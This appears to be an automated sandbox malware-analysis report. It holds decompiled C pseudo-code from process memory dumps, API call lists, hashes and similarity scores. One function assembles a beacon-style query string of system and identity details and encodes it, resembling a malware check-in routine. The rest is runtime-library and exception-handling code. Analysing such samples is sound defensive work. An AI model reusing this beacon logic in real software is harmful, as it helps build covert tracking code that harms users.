                                                                                                                                  			E00A3AF24(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				signed int* _t43;
                                                                                                                                  				char _t44;
                                                                                                                                  				void* _t46;
                                                                                                                                  				void* _t49;
                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				void* _t65;
                                                                                                                                  				long _t66;
                                                                                                                                  				signed int* _t80;
                                                                                                                                  				signed int* _t82;
                                                                                                                                  				void* _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				void* _t89;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t99;
                                                                                                                                  				void* _t106;
                                                                                                                                  
                                                                                                                                  				_t43 = _t84;
                                                                                                                                  				_t65 = __ebx + 2;
                                                                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                  				_t89 = _t95;
                                                                                                                                  				_t96 = _t95 - 8;
                                                                                                                                  				_push(_t65);
                                                                                                                                  				_push(_t84);
                                                                                                                                  				_push(_t89);
                                                                                                                                  				asm("cld");
                                                                                                                                  				_t66 = _a8;
                                                                                                                                  				_t44 = _a4;
                                                                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					E00A3B08F(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                  					_t46 = 1;
                                                                                                                                  				} else {
                                                                                                                                  					_v12 = _t44;
                                                                                                                                  					_v8 = _a12;
                                                                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                                                                  					_t80 =  *(_t66 + 8);
                                                                                                                                  					_t49 = E00A3B149(_t66);
                                                                                                                                  					_t99 = _t96 + 4;
                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                  						goto L11;
                                                                                                                                  					} else {
                                                                                                                                  						while(_t86 != 0xffffffff) {
                                                                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L8:
                                                                                                                                  								_t80 =  *(_t66 + 8);
                                                                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t54 =  *_t53();
                                                                                                                                  								_t89 = _t89;
                                                                                                                                  								_t86 = _t86;
                                                                                                                                  								_t66 = _a8;
                                                                                                                                  								_t55 = _t54;
                                                                                                                                  								_t106 = _t54;
                                                                                                                                  								if(_t106 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t106 < 0) {
                                                                                                                                  										_t46 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t82 =  *(_t66 + 8);
                                                                                                                                  										E00A3B034(_t55, _t66);
                                                                                                                                  										_t89 = _t66 + 0x10;
                                                                                                                                  										E00A3B08F(_t89, _t66, 0);
                                                                                                                                  										_t99 = _t99 + 0xc;
                                                                                                                                  										E00A3B12B(_t82[2]);
                                                                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                  										_t66 = 0;
                                                                                                                                  										_t86 = 0;
                                                                                                                                  										 *(_t82[2])(1);
                                                                                                                                  										goto L8;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						L11:
                                                                                                                                  						_t46 = 1;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L13:
                                                                                                                                  				return _t46;
                                                                                                                                  			}
























                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction ID: 3ea574d4d32250adebb477b08403fdc0cb90e01c9f4c547181bd51669351b59c
                                                                                                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction Fuzzy Hash: 8021B3729002149FCB14EF68C8C59ABBBA5FF45360F058169F95ACB245EB30FA15CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                  			E6E8D21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				signed int* _t43;
                                                                                                                                  				char _t44;
                                                                                                                                  				void* _t46;
                                                                                                                                  				void* _t49;
                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				void* _t65;
                                                                                                                                  				long _t66;
                                                                                                                                  				signed int* _t80;
                                                                                                                                  				signed int* _t82;
                                                                                                                                  				void* _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				void* _t89;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t99;
                                                                                                                                  				void* _t106;
                                                                                                                                  
                                                                                                                                  				_t43 = _t84;
                                                                                                                                  				_t65 = __ebx + 2;
                                                                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                  				_t89 = _t95;
                                                                                                                                  				_t96 = _t95 - 8;
                                                                                                                                  				_push(_t65);
                                                                                                                                  				_push(_t84);
                                                                                                                                  				_push(_t89);
                                                                                                                                  				asm("cld");
                                                                                                                                  				_t66 = _a8;
                                                                                                                                  				_t44 = _a4;
                                                                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					E6E8D231B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                  					_t46 = 1;
                                                                                                                                  				} else {
                                                                                                                                  					_v12 = _t44;
                                                                                                                                  					_v8 = _a12;
                                                                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                                                                  					_t80 =  *(_t66 + 8);
                                                                                                                                  					_t49 = E6E8D23D5(_t66);
                                                                                                                                  					_t99 = _t96 + 4;
                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                  						goto L11;
                                                                                                                                  					} else {
                                                                                                                                  						while(_t86 != 0xffffffff) {
                                                                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L8:
                                                                                                                                  								_t80 =  *(_t66 + 8);
                                                                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t54 =  *_t53();
                                                                                                                                  								_t89 = _t89;
                                                                                                                                  								_t86 = _t86;
                                                                                                                                  								_t66 = _a8;
                                                                                                                                  								_t55 = _t54;
                                                                                                                                  								_t106 = _t54;
                                                                                                                                  								if(_t106 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t106 < 0) {
                                                                                                                                  										_t46 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t82 =  *(_t66 + 8);
                                                                                                                                  										E6E8D22C0(_t55, _t66);
                                                                                                                                  										_t89 = _t66 + 0x10;
                                                                                                                                  										E6E8D231B(_t89, _t66, 0);
                                                                                                                                  										_t99 = _t99 + 0xc;
                                                                                                                                  										E6E8D23B7(_t82[2]);
                                                                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                  										_t66 = 0;
                                                                                                                                  										_t86 = 0;
                                                                                                                                  										 *(_t82[2])(1);
                                                                                                                                  										goto L8;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						L11:
                                                                                                                                  						_t46 = 1;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L13:
                                                                                                                                  				return _t46;
                                                                                                                                  			}
























                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                  • Instruction ID: 3dba9b9fdb84efc16dfcfc6f9f73db927b97784e3e41c9c038a64ccd36ea66d3
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A36109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				void* __ebx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t59;
                                                                                                                                  				intOrPtr _t60;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t63;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				void* _t67;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				int _t71;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t78;
                                                                                                                                  				intOrPtr _t82;
                                                                                                                                  				intOrPtr _t86;
                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                  				void* _t94;
                                                                                                                                  				intOrPtr _t100;
                                                                                                                                  				signed int _t104;
                                                                                                                                  				char** _t106;
                                                                                                                                  				int _t109;
                                                                                                                                  				intOrPtr* _t112;
                                                                                                                                  				intOrPtr* _t114;
                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                  				intOrPtr* _t118;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  				intOrPtr _t126;
                                                                                                                                  				int _t130;
                                                                                                                                  				CHAR* _t132;
                                                                                                                                  				intOrPtr _t133;
                                                                                                                                  				void* _t134;
                                                                                                                                  				void* _t143;
                                                                                                                                  				int _t144;
                                                                                                                                  				void* _t145;
                                                                                                                                  				intOrPtr _t146;
                                                                                                                                  				void* _t148;
                                                                                                                                  				long _t152;
                                                                                                                                  				intOrPtr* _t153;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t160;
                                                                                                                                  
                                                                                                                                  				_t143 = __edx;
                                                                                                                                  				_t134 = __ecx;
                                                                                                                                  				_t59 = __eax;
                                                                                                                                  				_v12 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t60 =  *0xa3d018; // 0x53709a90
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t61 =  *0xa3d014; // 0x3a87c8cd
                                                                                                                                  				_t132 = _a16;
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t62 =  *0xa3d010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t63 =  *0xa3d00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t64 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t3 = _t64 + 0xa3e633; // 0x74666f73
                                                                                                                                  				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0xa3d02c,  *0xa3d004, _t59);
                                                                                                                                  				_t67 = E00A35B60();
                                                                                                                                  				_t68 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t4 = _t68 + 0xa3e673; // 0x74707526
                                                                                                                                  				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                                  				_t160 = _t158 + 0x38;
                                                                                                                                  				_t145 = _t144 + _t71;
                                                                                                                                  				_t72 = E00A31BBF(_t134);
                                                                                                                                  				_t133 = __imp__; // 0x74e05520
                                                                                                                                  				_v8 = _t72;
                                                                                                                                  				if(_t72 != 0) {
                                                                                                                                  					_t126 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t7 = _t126 + 0xa3e8cc; // 0x736e6426
                                                                                                                                  					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					_t145 = _t145 + _t130;
                                                                                                                                  					HeapFree( *0xa3d270, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t73 = E00A3137A();
                                                                                                                                  				_v8 = _t73;
                                                                                                                                  				if(_t73 != 0) {
                                                                                                                                  					_t121 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t11 = _t121 + 0xa3e8d4; // 0x6f687726
                                                                                                                                  					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					HeapFree( *0xa3d270, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t146 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				_t75 = E00A33857(0xa3d00a, _t146 + 4);
                                                                                                                                  				_t152 = 0;
                                                                                                                                  				_v20 = _t75;
                                                                                                                                  				if(_t75 == 0) {
                                                                                                                                  					L26:
                                                                                                                                  					HeapFree( *0xa3d270, _t152, _a16);
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					_t78 = RtlAllocateHeap( *0xa3d270, 0, 0x800);
                                                                                                                                  					_v8 = _t78;
                                                                                                                                  					if(_t78 == 0) {
                                                                                                                                  						L25:
                                                                                                                                  						HeapFree( *0xa3d270, _t152, _v20);
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  					E00A3A811(GetTickCount());
                                                                                                                                  					_t82 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  					__imp__(_t82 + 0x40);
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					_t86 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  					__imp__(_t86 + 0x40);
                                                                                                                                  					_t88 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  					_t148 = E00A31974(1, _t143, _a16,  *_t88);
                                                                                                                                  					_v28 = _t148;
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					if(_t148 == 0) {
                                                                                                                                  						L24:
                                                                                                                                  						HeapFree( *0xa3d270, _t152, _v8);
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					StrTrimA(_t148, 0xa3c2ac);
                                                                                                                                  					_push(_t148);
                                                                                                                                  					_t94 = E00A338CA();
                                                                                                                                  					_v16 = _t94;
                                                                                                                                  					if(_t94 == 0) {
                                                                                                                                  						L23:
                                                                                                                                  						HeapFree( *0xa3d270, _t152, _t148);
                                                                                                                                  						goto L24;
                                                                                                                                  					}
                                                                                                                                  					_t153 = __imp__;
                                                                                                                                  					 *_t153(_t148, _a4);
                                                                                                                                  					 *_t153(_v8, _v20);
                                                                                                                                  					_t154 = __imp__;
                                                                                                                                  					 *_t154(_v8, _v16);
                                                                                                                                  					_t100 = E00A31922( *_t154(_v8, _t148), _v8);
                                                                                                                                  					_a4 = _t100;
                                                                                                                                  					if(_t100 == 0) {
                                                                                                                                  						_v12 = 8;
                                                                                                                                  						L21:
                                                                                                                                  						E00A347D5();
                                                                                                                                  						L22:
                                                                                                                                  						HeapFree( *0xa3d270, 0, _v16);
                                                                                                                                  						_t152 = 0;
                                                                                                                                  						goto L23;
                                                                                                                                  					}
                                                                                                                                  					_t104 = E00A3365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                  					_v12 = _t104;
                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                  						_t157 = _v24;
                                                                                                                                  						_v12 = E00A33273(_t157, _a4, _a8, _a12);
                                                                                                                                  						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                  						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                  						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                  						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                  						_t118 =  *_t157;
                                                                                                                                  						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                  						E00A34AAB(_t157);
                                                                                                                                  					}
                                                                                                                                  					if(_v12 != 0x10d2) {
                                                                                                                                  						L16:
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							_t106 = _a8;
                                                                                                                                  							if(_t106 != 0) {
                                                                                                                                  								_t149 =  *_t106;
                                                                                                                                  								_t155 =  *_a12;
                                                                                                                                  								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                  								_t109 = E00A38FB2(_t149, _t149, _t155 >> 1);
                                                                                                                                  								_t148 = _v28;
                                                                                                                                  								 *_a12 = _t109;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L19:
                                                                                                                                  							E00A34AAB(_a4);
                                                                                                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                  								goto L22;
                                                                                                                                  							} else {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}





















































                                                                                                                                  0x00000000
                                                                                                                                  0x00a36395
                                                                                                                                  0x00a36354
                                                                                                                                  0x00000000
                                                                                                                                  0x00a36354
                                                                                                                                  0x00a3634c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A3611D
                                                                                                                                  • wsprintfA.USER32 ref: 00A3616D
                                                                                                                                  • wsprintfA.USER32 ref: 00A3618A
                                                                                                                                  • wsprintfA.USER32 ref: 00A361B6
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A361C8
                                                                                                                                  • wsprintfA.USER32 ref: 00A361E9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A361F9
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A36227
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A36238
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A3624C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A3626A
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A31974: strcpy.NTDLL ref: 00A319BE
                                                                                                                                    • Part of subcall function 00A31974: lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A31974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,00A3C2AC,?,033A95B0), ref: 00A362A1
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A338CA: lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                    • Part of subcall function 00A338CA: lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00A362C2
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00A362CA
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00A362D8
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00A362DE
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • wcstombs.NTDLL ref: 00A3636F
                                                                                                                                    • Part of subcall function 00A33273: SysAllocString.OLEAUT32(?), ref: 00A332AE
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00A363B0
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A363BC
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,033A95B0), ref: 00A363C8
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A363D4
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A363E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3748877296-8415677
                                                                                                                                  • Opcode ID: b358c58b032997962b0ef477687aaff8b91858e478c9bc42666717714980866e
                                                                                                                                  • Instruction ID: f3bf4cfa818d6f313c2660cb678590f3588d2d44a009e0af77e9c9281572c0f2
                                                                                                                                  • Opcode Fuzzy Hash: b358c58b032997962b0ef477687aaff8b91858e478c9bc42666717714980866e
                                                                                                                                  • Instruction Fuzzy Hash: B3912671900208EFDB11DFA8ED89AAE7BB9FF09350F144065F405EB261DB31E952DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
